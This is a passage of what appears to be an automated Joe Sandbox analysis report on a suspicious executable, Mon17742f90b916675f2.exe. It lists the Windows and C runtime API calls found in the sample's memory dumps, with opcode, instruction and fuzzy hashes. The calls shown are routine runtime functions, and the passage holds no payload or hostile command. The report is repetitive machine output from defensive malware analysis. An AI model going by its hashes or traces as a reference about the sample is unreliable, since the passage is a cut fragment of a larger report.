                                          • Part of subcall function 00856AB3: HeapAlloc.KERNEL32(00000000,?,?,?,0085242C,?,?,008510CE,0000000C,3B4B4A20,?,?,?,?,0085E95F,000000FF), ref: 00856AE5
                                        • __freea.LIBCMT ref: 0085AB83
                                        • __freea.LIBCMT ref: 0085ABA8
                                        Memory Dump Source
                                        • Source File: 00000012.00000002.4148259259.0000000000851000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00850000, based on PE: true
                                        • Associated: 00000012.00000002.4147953437.0000000000850000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 00000012.00000002.4148441425.000000000085F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 00000012.00000002.4148644975.0000000000866000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 00000012.00000002.4150058013.0000000000868000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_18_2_850000_Mon17742f90b916675f2.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocHeap
                                        • String ID:
                                        • API String ID: 2597970681-0
                                        • Opcode ID: 81ca6e3147bcea6553385d8dfc1ce509862c7d0f6b49e00a54afdf0949f5cf81
                                        • Instruction ID: f994e1f963dc7878126c78150e48158131cbd020aa9f4463815b090c707f828b
                                        • Opcode Fuzzy Hash: 81ca6e3147bcea6553385d8dfc1ce509862c7d0f6b49e00a54afdf0949f5cf81
                                        • Instruction Fuzzy Hash: AE51C472600216ABDF298F68CC81EBB7BAAFB44762F154769FD04D7140EB34DC58C692
                                        APIs
                                        • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,0085BDDE,?,00000000,?,00000000,00000000), ref: 0085B6AB
                                        • __fassign.LIBCMT ref: 0085B726
                                        • __fassign.LIBCMT ref: 0085B741
                                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 0085B767
                                        • WriteFile.KERNEL32(?,?,00000000,0085BDDE,00000000,?,?,?,?,?,?,?,?,?,0085BDDE,?), ref: 0085B786
                                        • WriteFile.KERNEL32(?,?,00000001,0085BDDE,00000000,?,?,?,?,?,?,?,?,?,0085BDDE,?), ref: 0085B7BF
                                        Memory Dump Source
                                        • Source File: 00000012.00000002.4148259259.0000000000851000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00850000, based on PE: true
                                        • Associated: 00000012.00000002.4147953437.0000000000850000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 00000012.00000002.4148441425.000000000085F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 00000012.00000002.4148644975.0000000000866000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 00000012.00000002.4150058013.0000000000868000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_18_2_850000_Mon17742f90b916675f2.jbxd
                                        Similarity
                                        • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                        • String ID:
                                        • API String ID: 1324828854-0
                                        • Opcode ID: fe72cabee2ac02f6f3372679d13c1decf437fcfc6aadfba91493e5c9d12bcb1d
                                        • Instruction ID: d3d316be392a906b5822f80a14df4c474c27464ef325860b64e0d4d470927298
                                        • Opcode Fuzzy Hash: fe72cabee2ac02f6f3372679d13c1decf437fcfc6aadfba91493e5c9d12bcb1d
                                        • Instruction Fuzzy Hash: C551E270E002099FCB10CFA8DC85AEEBBF8FF19341F14412AE951E7291E770A944CBA0
                                        APIs
                                          • Part of subcall function 00859314: _free.LIBCMT ref: 0085933D
                                        • _free.LIBCMT ref: 0085939E
                                          • Part of subcall function 00856A79: HeapFree.KERNEL32(00000000,00000000,?,00859342,?,00000000,?,00000000,?,00859369,?,00000007,?,?,00859786,?), ref: 00856A8F
                                          • Part of subcall function 00856A79: GetLastError.KERNEL32(?,?,00859342,?,00000000,?,00000000,?,00859369,?,00000007,?,?,00859786,?,?), ref: 00856AA1
                                        • _free.LIBCMT ref: 008593A9
                                        • _free.LIBCMT ref: 008593B4
                                        • _free.LIBCMT ref: 00859408
                                        • _free.LIBCMT ref: 00859413
                                        • _free.LIBCMT ref: 0085941E
                                        • _free.LIBCMT ref: 00859429
                                        Memory Dump Source
                                        • Source File: 00000012.00000002.4148259259.0000000000851000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00850000, based on PE: true
                                        • Associated: 00000012.00000002.4147953437.0000000000850000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 00000012.00000002.4148441425.000000000085F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 00000012.00000002.4148644975.0000000000866000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 00000012.00000002.4150058013.0000000000868000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_18_2_850000_Mon17742f90b916675f2.jbxd
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast
                                        • String ID:
                                        • API String ID: 776569668-0
                                        • Opcode ID: de0c4abfa7c1859f01765e3500e606eec0957940f7d3b2b7b979ae10827cc60f
                                        • Instruction ID: 7fab37d5cc7038485c615539b6a0a33c36922e45740ef6b436f8a1c57edbaca4
                                        • Opcode Fuzzy Hash: de0c4abfa7c1859f01765e3500e606eec0957940f7d3b2b7b979ae10827cc60f
                                        • Instruction Fuzzy Hash: 42117231540714F6D621B7B4CC0BFCB77ACFF00741F806819FAD9E61A2E664B51C56A2
                                        APIs
                                        • GetLastError.KERNEL32(?,?,00854D07,00853C37,00864618,00000010,008533FF,?,?,?,?,?,00000000,?), ref: 00854D1E
                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00854D2C
                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00854D45
                                        • SetLastError.KERNEL32(00000000,00854D07,00853C37,00864618,00000010,008533FF,?,?,?,?,?,00000000,?), ref: 00854D97
                                        Memory Dump Source
                                        • Source File: 00000012.00000002.4148259259.0000000000851000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00850000, based on PE: true
                                        • Associated: 00000012.00000002.4147953437.0000000000850000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 00000012.00000002.4148441425.000000000085F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 00000012.00000002.4148644975.0000000000866000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 00000012.00000002.4150058013.0000000000868000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_18_2_850000_Mon17742f90b916675f2.jbxd
                                        Similarity
                                        • API ID: ErrorLastValue___vcrt_
                                        • String ID:
                                        • API String ID: 3852720340-0
                                        • Opcode ID: eb2dceab9c050048c61a744a741fb8cf604346d9cb5f1729545bfc672483288b
                                        • Instruction ID: 86481e731640b9394a4fe6082fbbe670579aedc0556e7802cb48a5600055d5dc
                                        • Opcode Fuzzy Hash: eb2dceab9c050048c61a744a741fb8cf604346d9cb5f1729545bfc672483288b
                                        • Instruction Fuzzy Hash: B801B132249F11AEA7342BB8BC856663A69FF1177B3301339FD10E20E1FF554C585182
                                        APIs
                                        • GetLastError.KERNEL32(?,?,00856995,00864800,0000000C,00852EF5), ref: 00856FF7
                                        • _free.LIBCMT ref: 0085702A
                                        • _free.LIBCMT ref: 00857052
                                        • SetLastError.KERNEL32(00000000), ref: 0085705F
                                        • SetLastError.KERNEL32(00000000), ref: 0085706B
                                        • _abort.LIBCMT ref: 00857071
                                        Memory Dump Source
                                        • Source File: 00000012.00000002.4148259259.0000000000851000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00850000, based on PE: true
                                        • Associated: 00000012.00000002.4147953437.0000000000850000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 00000012.00000002.4148441425.000000000085F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 00000012.00000002.4148644975.0000000000866000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 00000012.00000002.4150058013.0000000000868000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_18_2_850000_Mon17742f90b916675f2.jbxd
                                        Similarity
                                        • API ID: ErrorLast$_free$_abort
                                        • String ID:
                                        • API String ID: 3160817290-0
                                        • Opcode ID: 9669ac8c8110c0718a6e88736b1dd74b1992ac8e9b2c56022682bec15dc228f6
                                        • Instruction ID: bb3f39e4360d931b84c1748736252e96d780572753ae2996b2799aaa677d6c5f
                                        • Opcode Fuzzy Hash: 9669ac8c8110c0718a6e88736b1dd74b1992ac8e9b2c56022682bec15dc228f6
                                        • Instruction Fuzzy Hash: DFF0A436108E1066C622733D7C0AE1A26AAFBC1777B758024FD14E32D2FE65881E5163
                                        APIs
                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00855AC7,00000003,?,00855A67,00000003,00864778,0000000C,00855B7A,00000003,00000002), ref: 00855AF2
                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00855B05
                                        • FreeLibrary.KERNEL32(00000000,?,?,?,00855AC7,00000003,?,00855A67,00000003,00864778,0000000C,00855B7A,00000003,00000002,00000000), ref: 00855B28
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000012.00000002.4148259259.0000000000851000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00850000, based on PE: true
                                        • Associated: 00000012.00000002.4147953437.0000000000850000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 00000012.00000002.4148441425.000000000085F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 00000012.00000002.4148644975.0000000000866000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 00000012.00000002.4150058013.0000000000868000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_18_2_850000_Mon17742f90b916675f2.jbxd
                                        Similarity
                                        • API ID: AddressFreeHandleLibraryModuleProc
                                        • String ID: CorExitProcess$mscoree.dll
                                        • API String ID: 4061214504-1276376045
                                        • Opcode ID: 54eda19b24b54a13d72d3769ead5c155efce944f23299e9fe66907309c08ac1f
                                        • Instruction ID: e8e1b7013985af700e03b2f12e5bc2cdfc60040edbd419ef9479ef024c74c60f
                                        • Opcode Fuzzy Hash: 54eda19b24b54a13d72d3769ead5c155efce944f23299e9fe66907309c08ac1f
                                        • Instruction Fuzzy Hash: 03F03130A10608BBCB115B54DC19B9EBFB9FB08753F440064F906E2292DF754944CA51
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000012.00000002.4148259259.0000000000851000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00850000, based on PE: true
                                        • Associated: 00000012.00000002.4147953437.0000000000850000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 00000012.00000002.4148441425.000000000085F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 00000012.00000002.4148644975.0000000000866000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 00000012.00000002.4150058013.0000000000868000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_18_2_850000_Mon17742f90b916675f2.jbxd
                                        Similarity
                                        • API ID: _free
                                        • String ID:
                                        • API String ID: 269201875-0
                                        • Opcode ID: 2c0876a46ad195574e8931a11ad811c3a88d9b06c3ba0f88e9bb53bf62d00172
                                        • Instruction ID: 9df0fa9de840f9950d1511faa1307096d4aa25ca9dbc4994a502578014c733bf
                                        • Opcode Fuzzy Hash: 2c0876a46ad195574e8931a11ad811c3a88d9b06c3ba0f88e9bb53bf62d00172
                                        • Instruction Fuzzy Hash: F241DF32E002009FCB24DF78C881A5EB7F5FF88315B9585A9E915EB351EA31ED19CB81
                                        APIs
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,008583CC,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 00859481
                                        • __alloca_probe_16.LIBCMT ref: 008594B9
                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0085950A
                                        • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 0085951C
                                        • __freea.LIBCMT ref: 00859525
                                          • Part of subcall function 00856AB3: HeapAlloc.KERNEL32(00000000,?,?,?,0085242C,?,?,008510CE,0000000C,3B4B4A20,?,?,?,?,0085E95F,000000FF), ref: 00856AE5
                                        Memory Dump Source
                                        • Source File: 00000012.00000002.4148259259.0000000000851000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00850000, based on PE: true
                                        • Associated: 00000012.00000002.4147953437.0000000000850000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 00000012.00000002.4148441425.000000000085F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 00000012.00000002.4148644975.0000000000866000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 00000012.00000002.4150058013.0000000000868000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_18_2_850000_Mon17742f90b916675f2.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide$AllocHeapStringType__alloca_probe_16__freea
                                        • String ID:
                                        • API String ID: 1857427562-0
                                        • Opcode ID: c73277cba7bdef47195cb849b896ebfa18339d955dbcdeaf5ed3aa36307a5b6a
                                        • Instruction ID: d1e234ace2abc7801f202f042254aa73688527a56eae5c880594f461265e0994
                                        • Opcode Fuzzy Hash: c73277cba7bdef47195cb849b896ebfa18339d955dbcdeaf5ed3aa36307a5b6a
                                        • Instruction Fuzzy Hash: 6D31B272A0020AEBDF259F68DC45DAE7BA5FB44312F040168FC04D7191E735CD69CB91
                                        APIs
                                        • GetEnvironmentStringsW.KERNEL32 ref: 00858512
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00858535
                                          • Part of subcall function 00856AB3: HeapAlloc.KERNEL32(00000000,?,?,?,0085242C,?,?,008510CE,0000000C,3B4B4A20,?,?,?,?,0085E95F,000000FF), ref: 00856AE5
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0085855B
                                        • _free.LIBCMT ref: 0085856E
                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0085857D
                                        Memory Dump Source
                                        • Source File: 00000012.00000002.4148259259.0000000000851000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00850000, based on PE: true
                                        • Associated: 00000012.00000002.4147953437.0000000000850000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 00000012.00000002.4148441425.000000000085F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 00000012.00000002.4148644975.0000000000866000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 00000012.00000002.4150058013.0000000000868000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_18_2_850000_Mon17742f90b916675f2.jbxd
                                        Similarity
                                        • API ID: ByteCharEnvironmentMultiStringsWide$AllocFreeHeap_free
                                        • String ID:
                                        • API String ID: 2278895681-0
                                        • Opcode ID: 97432a34f527a5cc29b0f92cded2d032d4804e7fca5d80e5d773857b5e61fcba
                                        • Instruction ID: b781eea33b81c7c1f5f09495db6db434d5fe4de5b03d50d431762d5371d6613f
                                        • Opcode Fuzzy Hash: 97432a34f527a5cc29b0f92cded2d032d4804e7fca5d80e5d773857b5e61fcba
                                        • Instruction Fuzzy Hash: F701DD72901615BF6321577A5C88C7B6A6CFAC2FA3318412AFD04E3141FE648D0D41B1
                                        APIs
                                        • GetLastError.KERNEL32(?,?,?,008556B2,00856AF6,?,?,0085242C,?,?,008510CE,0000000C,3B4B4A20), ref: 0085707C
                                        • _free.LIBCMT ref: 008570B1
                                        • _free.LIBCMT ref: 008570D8
                                        • SetLastError.KERNEL32(00000000), ref: 008570E5
                                        • SetLastError.KERNEL32(00000000), ref: 008570EE
                                        Memory Dump Source
                                        • Source File: 00000012.00000002.4148259259.0000000000851000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00850000, based on PE: true
                                        • Associated: 00000012.00000002.4147953437.0000000000850000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 00000012.00000002.4148441425.000000000085F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 00000012.00000002.4148644975.0000000000866000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 00000012.00000002.4150058013.0000000000868000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_18_2_850000_Mon17742f90b916675f2.jbxd
                                        Similarity
                                        • API ID: ErrorLast$_free
                                        • String ID:
                                        • API String ID: 3170660625-0
                                        • Opcode ID: c4b54706ccbc91924b9f2efec79f129944d8e3bbf2e2d4190223e50bf943416b
                                        • Instruction ID: 007010046835fdf1a83098f3cc9258974a2334bd8bcd2d3cccb6f0b148cfd611
                                        • Opcode Fuzzy Hash: c4b54706ccbc91924b9f2efec79f129944d8e3bbf2e2d4190223e50bf943416b
                                        • Instruction Fuzzy Hash: 5701D136208E11A7CA2277387C45D2B26AAFBC13777258029FE14E32D2FE64881E4172
                                        APIs
                                        • _free.LIBCMT ref: 008592C3
                                          • Part of subcall function 00856A79: HeapFree.KERNEL32(00000000,00000000,?,00859342,?,00000000,?,00000000,?,00859369,?,00000007,?,?,00859786,?), ref: 00856A8F
                                          • Part of subcall function 00856A79: GetLastError.KERNEL32(?,?,00859342,?,00000000,?,00000000,?,00859369,?,00000007,?,?,00859786,?,?), ref: 00856AA1
                                        • _free.LIBCMT ref: 008592D5
                                        • _free.LIBCMT ref: 008592E7
                                        • _free.LIBCMT ref: 008592F9
                                        • _free.LIBCMT ref: 0085930B
                                        Memory Dump Source
                                        • Source File: 00000012.00000002.4148259259.0000000000851000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00850000, based on PE: true
                                        • Associated: 00000012.00000002.4147953437.0000000000850000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 00000012.00000002.4148441425.000000000085F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 00000012.00000002.4148644975.0000000000866000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 00000012.00000002.4150058013.0000000000868000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_18_2_850000_Mon17742f90b916675f2.jbxd
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast
                                        • String ID:
                                        • API String ID: 776569668-0
                                        • Opcode ID: 2c516ee4903098f9c014647eb11bf0e4f0c6dc71b7bea2e64187860b9c8f3da7
                                        • Instruction ID: 9fce01cb4ce1c56a0f0fac836f7da55ff7a5ddf4718a4964828361adf4a4e2b8
                                        • Opcode Fuzzy Hash: 2c516ee4903098f9c014647eb11bf0e4f0c6dc71b7bea2e64187860b9c8f3da7
                                        • Instruction Fuzzy Hash: 78F06272414250FBC620DBA8F8C2C6A73E9FB007217A5580AFC49E7660EB70FCD88661
                                        APIs
                                        • _free.LIBCMT ref: 00856639
                                          • Part of subcall function 00856A79: HeapFree.KERNEL32(00000000,00000000,?,00859342,?,00000000,?,00000000,?,00859369,?,00000007,?,?,00859786,?), ref: 00856A8F
                                          • Part of subcall function 00856A79: GetLastError.KERNEL32(?,?,00859342,?,00000000,?,00000000,?,00859369,?,00000007,?,?,00859786,?,?), ref: 00856AA1
                                        • _free.LIBCMT ref: 0085664B
                                        • _free.LIBCMT ref: 0085665E
                                        • _free.LIBCMT ref: 0085666F
                                        • _free.LIBCMT ref: 00856680
                                        Memory Dump Source
                                        • Source File: 00000012.00000002.4148259259.0000000000851000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00850000, based on PE: true
                                        • Associated: 00000012.00000002.4147953437.0000000000850000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 00000012.00000002.4148441425.000000000085F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 00000012.00000002.4148644975.0000000000866000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 00000012.00000002.4150058013.0000000000868000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_18_2_850000_Mon17742f90b916675f2.jbxd
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast
                                        • String ID:
                                        • API String ID: 776569668-0
                                        • Opcode ID: 7d66ed1dea3eb52bb702b4c2e63945a117bc36cb46bb02c7573782bc11d57813
                                        • Instruction ID: 533566867b587b64cb9ccd3bdaf70ef647e0d393e9c1e48c5e023748619e54f3
                                        • Opcode Fuzzy Hash: 7d66ed1dea3eb52bb702b4c2e63945a117bc36cb46bb02c7573782bc11d57813
                                        • Instruction Fuzzy Hash: 4AF01D794042A0AFCB02AF68ED424153BA0FB04735396660BF814E7375FBF109799BC5
                                        APIs
                                        • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exe,00000104), ref: 00855C0D
                                        • _free.LIBCMT ref: 00855CD8
                                        • _free.LIBCMT ref: 00855CE2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000012.00000002.4148259259.0000000000851000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00850000, based on PE: true
                                        • Associated: 00000012.00000002.4147953437.0000000000850000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 00000012.00000002.4148441425.000000000085F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 00000012.00000002.4148644975.0000000000866000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 00000012.00000002.4150058013.0000000000868000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_18_2_850000_Mon17742f90b916675f2.jbxd
                                        Similarity
                                        • API ID: _free$FileModuleName
                                        • String ID: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exe
                                        • API String ID: 2506810119-2809151018
                                        • Opcode ID: d3ae845dd182c318451d23049565eb7a268a5b5a00844e3a3a0001c188668c70
                                        • Instruction ID: 39824cfc3b8cfc5d3cbc9f2636c26d7417e6cba2d30769cb98bd1118ffce539d
                                        • Opcode Fuzzy Hash: d3ae845dd182c318451d23049565eb7a268a5b5a00844e3a3a0001c188668c70
                                        • Instruction Fuzzy Hash: 88316B71A00B58EFCB21DB99D89199EBBF8FF85711B244066FC04D7211E6B18E48CB91
                                        Memory Dump Source
                                        • Source File: 00000012.00000002.4148259259.0000000000851000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00850000, based on PE: true
                                        • Associated: 00000012.00000002.4147953437.0000000000850000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 00000012.00000002.4148441425.000000000085F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 00000012.00000002.4148644975.0000000000866000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 00000012.00000002.4150058013.0000000000868000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_18_2_850000_Mon17742f90b916675f2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 182f0dc93ab4c9f8620a0d21306716cab9b71d96362ac84730c340edf337ad35
                                        • Instruction ID: 28a69d5f275efaead89acdc57bef287bbfa4558df4f128c97ee68dfd7adcfcbc
                                        • Opcode Fuzzy Hash: 182f0dc93ab4c9f8620a0d21306716cab9b71d96362ac84730c340edf337ad35
                                        • Instruction Fuzzy Hash: C90184B2205A157EF6211A787CC0F276B5DFB5177AB740325B921F31D1FB608C6C4161
                                        APIs
                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,008572DB,?,00000000,00000000,00000000,?,0085754C,00000006,FlsSetValue), ref: 00857366
                                        • GetLastError.KERNEL32(?,008572DB,?,00000000,00000000,00000000,?,0085754C,00000006,FlsSetValue,008604E0,008604E8,00000000,00000364,?,008570C5), ref: 00857372
                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,008572DB,?,00000000,00000000,00000000,?,0085754C,00000006,FlsSetValue,008604E0,008604E8,00000000), ref: 00857380
                                        Memory Dump Source
                                        • Source File: 00000012.00000002.4148259259.0000000000851000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00850000, based on PE: true
                                        • Associated: 00000012.00000002.4147953437.0000000000850000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 00000012.00000002.4148441425.000000000085F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 00000012.00000002.4148644975.0000000000866000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 00000012.00000002.4150058013.0000000000868000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_18_2_850000_Mon17742f90b916675f2.jbxd
                                        Similarity
                                        • API ID: LibraryLoad$ErrorLast
                                        • String ID:
                                        • API String ID: 3177248105-0
                                        • Opcode ID: 7b3834a7bce2597c5eb1126e9b6758eabe00a24333f999c034d217a659f095a9
                                        • Instruction ID: 7ea45706e53d412ee8ea5d7ce11e40d1c2eec833e9e69b8b3bdfb386b18a3c34
                                        • Opcode Fuzzy Hash: 7b3834a7bce2597c5eb1126e9b6758eabe00a24333f999c034d217a659f095a9
                                        • Instruction Fuzzy Hash: 0101D432209726ABC7214A68FC44A9B7B98FF447B37558620FD06D32C1D730D804D6E0
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000012.00000002.4148259259.0000000000851000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00850000, based on PE: true
                                        • Associated: 00000012.00000002.4147953437.0000000000850000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 00000012.00000002.4148441425.000000000085F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 00000012.00000002.4148644975.0000000000866000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 00000012.00000002.4150058013.0000000000868000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_18_2_850000_Mon17742f90b916675f2.jbxd
                                        Similarity
                                        • API ID: _com_issue_error$AllocString
                                        • String ID:
                                        • API String ID: 245909816-0
                                        • Opcode ID: e59e226f6cf242f80bf347ffac5fb5cc7c90b88ea7a61753372c121039fbd285
                                        • Instruction ID: e8eb47fedb9aebef139eacd272837c1ede6dced96c20443404d53eb45a303ff8
                                        • Opcode Fuzzy Hash: e59e226f6cf242f80bf347ffac5fb5cc7c90b88ea7a61753372c121039fbd285
                                        • Instruction Fuzzy Hash: EC11D672941B55EBDB208F58C805B5ABBE8FB04B71F10822AED14E7380EBB99904C7D1
                                        APIs
                                        • ___BuildCatchObject.LIBVCRUNTIME ref: 008533D1
                                          • Part of subcall function 00853A09: ___AdjustPointer.LIBCMT ref: 00853A53
                                        • _UnwindNestedFrames.LIBCMT ref: 008533E8
                                        • ___FrameUnwindToState.LIBVCRUNTIME ref: 008533FA
                                        • CallCatchBlock.LIBVCRUNTIME ref: 0085341E
                                        Memory Dump Source
                                        • Source File: 00000012.00000002.4148259259.0000000000851000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00850000, based on PE: true
                                        • Associated: 00000012.00000002.4147953437.0000000000850000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 00000012.00000002.4148441425.000000000085F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 00000012.00000002.4148644975.0000000000866000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 00000012.00000002.4150058013.0000000000868000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_18_2_850000_Mon17742f90b916675f2.jbxd
                                        Similarity
                                        • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                        • String ID:
                                        • API String ID: 2633735394-0
                                        • Opcode ID: 99e7a00b3d64d747c11acfba084bd7f2c62d1f3d3bfdfe6e74b3db22714ce2ef
                                        • Instruction ID: cf8a3418aa955c5cd8828524b3edd9cf99537423481ca01ad6c3207fde6923d0
                                        • Opcode Fuzzy Hash: 99e7a00b3d64d747c11acfba084bd7f2c62d1f3d3bfdfe6e74b3db22714ce2ef
                                        • Instruction Fuzzy Hash: 34012532000108BBCF129F59DC41EDA7FBAFF58796F158114FD18A6120D772E9A5EBA1
                                        APIs
                                        • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00854BC4
                                        • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00854BC9
                                        • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00854BCE
                                          • Part of subcall function 00854F9E: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 00854FAF
                                        • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00854BE3
                                        Memory Dump Source
